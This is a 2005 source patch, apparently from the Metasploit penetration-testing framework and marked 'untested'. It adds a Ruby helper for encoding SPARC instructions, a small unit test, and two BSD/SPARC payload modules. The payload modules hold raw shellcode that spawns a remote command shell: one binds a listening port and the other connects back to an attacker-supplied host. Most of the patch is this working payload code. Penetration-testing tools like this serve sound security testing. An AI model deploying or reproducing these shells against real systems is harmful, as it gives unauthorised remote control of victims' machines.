From efc02cfd89ad0da1ed8fbd149b2ec6a8de206908 Mon Sep 17 00:00:00 2001 From: Matt Miller Date: Tue, 11 Oct 2005 22:37:41 +0000 Subject: [PATCH] sparc payloads, untested git-svn-id: file:///home/svn/incoming/trunk@2963 4d416f70-5f16-0410-b530-b9f4589650da --- lib/rex/arch.rb | 1 + lib/rex/arch/sparc.rb | 61 +++++++++++++++++++ lib/rex/arch/sparc.rb.ut.rb | 18 ++++++ .../singles/bsd/sparc/shell_bind_tcp.rb | 46 ++++++++++++++ .../singles/bsd/sparc/shell_reverse_tcp.rb | 47 ++++++++++++++ 5 files changed, 173 insertions(+) create mode 100644 lib/rex/arch/sparc.rb create mode 100644 lib/rex/arch/sparc.rb.ut.rb create mode 100644 modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb create mode 100644 modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb diff --git a/lib/rex/arch.rb b/lib/rex/arch.rb index 7b4bf101fa..9ea72436eb 100644 --- a/lib/rex/arch.rb +++ b/lib/rex/arch.rb @@ -2,6 +2,7 @@ module Rex module Arch require 'rex/arch/x86' + require 'rex/arch/sparc' # # This routine adjusts the stack pointer for a given architecture diff --git a/lib/rex/arch/sparc.rb b/lib/rex/arch/sparc.rb new file mode 100644 index 0000000000..70ed5915d6 --- /dev/null +++ b/lib/rex/arch/sparc.rb @@ -0,0 +1,61 @@ +#!/usr/bin/ruby + +module Rex +module Arch + +# +# Everything here is mostly stolen from vlad's perl x86 stuff +# +module Sparc + + # + # Register number constants + # + RegisterNumber = + { + 'g0' => 0, 'g1' => 1, 'g2' => 2, 'g3' => 3, + 'g4' => 4, 'g5' => 5, 'g6' => 6, 'g7' => 7, + 'o0' => 8, 'o1' => 9, 'o2' => 10, 'o3' => 11, + 'o4' => 12, 'o5' => 13, 'o6' => 14, 'o7' => 15, + 'l0' => 16, 'l1' => 17, 'l2' => 18, 'l3' => 19, + 'l4' => 20, 'l5' => 21, 'l6' => 22, 'l7' => 23, + 'i0' => 24, 'i1' => 25, 'i2' => 26, 'i3' => 27, + 'i4' => 28, 'i5' => 29, 'i6' => 30, 'i7' => 31, + } + + def self.sethi(constant, dst) + [ + (RegisterNumber[dst] << 25) | + (4 << 22) | + (constant >> 10) + ].pack('N') + end + + def self.ori(src, constant, dst) + [ + (2 << 30) | + (RegisterNumber[dst] << 25) | + (2 << 19) | + (RegisterNumber[src] << 14) | + (1 << 13) | + (constant & 0x1fff) + ].pack('N') + end + + def self.set(constant, dst) + if (constant <= 4096 and constant >= 0) + ori('g0', constant, dst) + elsif (constant & 0x3ff) + set_dword(constant, dst) + else + sethi(constant, dst) + end + end + + def self.set_dword(constant, dst) + sethi(constant, dst) + ori(dst, constant & 0x3ff, dst) + end + +end + +end end diff --git a/lib/rex/arch/sparc.rb.ut.rb b/lib/rex/arch/sparc.rb.ut.rb new file mode 100644 index 0000000000..43e1a17012 --- /dev/null +++ b/lib/rex/arch/sparc.rb.ut.rb @@ -0,0 +1,18 @@ +#!/usr/bin/ruby + +$:.unshift(File.join(File.dirname(__FILE__), '..', '..')) + +require 'test/unit' +require 'rex/string_utils' +require 'rex/arch/sparc' + +class Rex::Arch::Sparc::UnitTest < ::Test::Unit::TestCase + + Klass = Rex::Arch::Sparc + + def test_set + assert_equal("\x88\x10\x20\x02", Klass.set(0x2, 'g4')) + assert_equal("\x09\x00\x00\x08\x88\x11\x22\x22", Klass.set(0x2222, 'g4')) + end + +end diff --git a/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb new file mode 100644 index 0000000000..564a8cfa3d --- /dev/null +++ b/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb @@ -0,0 +1,46 @@ +require 'msf/core' +require 'msf/core/handler/bind_tcp' +require 'msf/base/sessions/command_shell' + +module Msf +module Payloads +module Singles +module Bsd +module Sparc + +module ShellBindTcp + + include Msf::Payload::Single + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BSD Command Shell, Bind TCP Inline', + 'Version' => '$Revision$', + 'Description' => 'Listen for a connection and spawn a command shell', + 'Author' => 'vlad902', + 'Platform' => 'bsd', + 'Arch' => ARCH_SPARC, + 'Handler' => Msf::Handler::BindTcp, + 'Session' => Msf::Sessions::CommandShell)) + end + + def generate + port = (datastore['RPORT'] || 0).to_i + payload = + "\x9c\x2b\xa0\x07\x94\x1a\xc0\x0b\x92\x10\x20\x01\x90\x10\x20\x02" + + "\x82\x10\x20\x61\x91\xd0\x20\x08\xd0\x23\xbf\xf8" + + Rex::Arch::Sparc.set(0xff020000 | port, "l0") + + "\xe0\x23\xbf\xf0\xc0\x23\xbf\xf4\x92\x23\xa0\x10\x94\x10\x20\x10" + + "\x82\x10\x20\x68\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x10\x20\x01" + + "\x82\x10\x20\x6a\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x1a\x40\x09" + + "\x94\x12\x40\x09\x82\x10\x20\x1e\x91\xd0\x20\x08\xd0\x23\xbf\xf8" + + "\x92\x10\x20\x03\x92\xa2\x60\x01\x82\x10\x20\x5a\x91\xd0\x20\x08" + + "\x12\xbf\xff\xfd\xd0\x03\xbf\xf8\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a" + + "\xa0\x14\x21\x6e\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08" + + "\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b" + + "\x91\xd0\x20\x08" + end + +end + +end end end end end diff --git a/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb new file mode 100644 index 0000000000..c43ba0e126 --- /dev/null +++ b/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb @@ -0,0 +1,47 @@ +require 'msf/core' +require 'msf/core/handler/reverse_tcp' +require 'msf/base/sessions/command_shell' + +module Msf +module Payloads +module Singles +module Bsd +module Sparc + +module ShellReverseTcp + + include Msf::Payload::Single + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'BSD Command Shell, Reverse TCP Inline', + 'Version' => '$Revision$', + 'Description' => 'Connect back to attacker and spawn a command shell', + 'Author' => 'vlad902', + 'Platform' => 'bsd', + 'Arch' => ARCH_SPARC, + 'Handler' => Msf::Handler::ReverseTcp, + 'Session' => Msf::Sessions::CommandShell + )) + end + + def generate + port = (datastore['RPORT'] || '0').to_i + host = Rex::Socket.resolv_nbo_i(datastore['RHOST'] || '127.0.0.1') + + payload = + "\x9c\x2b\xa0\x07\x94\x1a\xc0\x0b\x92\x10\x20\x01\x90\x10\x20\x02" + + "\x82\x10\x20\x61\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x92\x10\x20\x03" + + "\x92\xa2\x60\x01\x82\x10\x20\x5a\x91\xd0\x20\x08\x12\xbf\xff\xfd" + + "\xd0\x03\xbf\xf8" + + Rex::Arch::Sparc.set(0xff020000 | port, "l0") + + Rex::Arch::Sparc.set(host, "l1") + + "\xe0\x3b\xbf\xf0\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\x62" + + "\x91\xd0\x20\x08\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a\xa0\x14\x21\x6e" + + "\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08\xe0\x3b\xbf\xf0" + + "\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" + end + +end + +end end end end end